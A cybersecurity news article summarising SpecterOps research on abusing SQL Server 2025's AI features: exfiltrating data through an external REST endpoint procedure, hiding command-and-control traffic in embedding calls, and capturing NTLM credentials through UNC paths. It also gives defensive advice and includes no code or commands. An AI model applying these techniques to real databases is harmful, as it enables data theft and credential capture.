Cybersecurity experts are raising alarms as hackers find innovative ways to misuse enterprise technologies. The latest concern revolves around the AI capabilities integrated into Microsoft SQL Server 2025, which are reportedly being exploited for data theft.
Research conducted by SpecterOps reveals that these AI functionalities can be manipulated to extract sensitive information and facilitate command-and-control operations, all managed from within the database framework.
Originally, SQL Server 2025 was equipped with AI to enhance modern applications like Retrieval-Augmented Generation (RAG). However, the same features are now being subverted as effective tools for cybercriminals.
New AI Features Pose Security Risks
The critical vulnerability lies in the newly added stored procedure sp_invoke_external_rest_endpoint, which allows SQL Server to initiate HTTPS communications with outside servers. While intended for legitimate API interactions, this function can be repurposed for unauthorized data transmission.
With support for payloads as large as 100 MB, attackers can efficiently transfer substantial datasets, such as user credentials, across encrypted channels, evading traditional detection methods.
This discovery is underscored by public access to proof-of-concept code on platforms like GitHub, showcasing the real-world applications of these vulnerabilities.
Exploiting AI for Covert Operations
The CREATE EXTERNAL MODEL feature, when combined with AI_GENERATE_EMBEDDINGS, can be hijacked to communicate covertly. These functions, designed for AI integrations, can mask malicious activities as legitimate data exchanges.
By embedding instructions within AI-generated data, attackers can sustain an undetectable command-and-control infrastructure entirely through SQL queries.
Additionally, by using UNC paths in AI configuration settings, attackers can provoke NTLM authentication over SMB, capturing network credentials.
Protective Measures and Future Implications
The exploitation of these features marks a significant challenge for security teams, who must now differentiate between authentic and malicious database traffic. Traditional security measures, such as scrutinizing outbound traffic, are less effective.
To counter these threats, SpecterOps advises strict regulation of database access, especially for sysadmin roles, and vigilant monitoring of external REST endpoints and AI model interactions for potential abuses.
Restricting database server connections and establishing baseline AI traffic patterns are recommended strategies to identify anomalies.
This situation underscores the necessity for advanced security protocols accompanying technological advancements, as attackers continue to adapt and exploit emerging software capabilities.
Stay updated with our latest insights by following us on Google News, LinkedIn, and X.
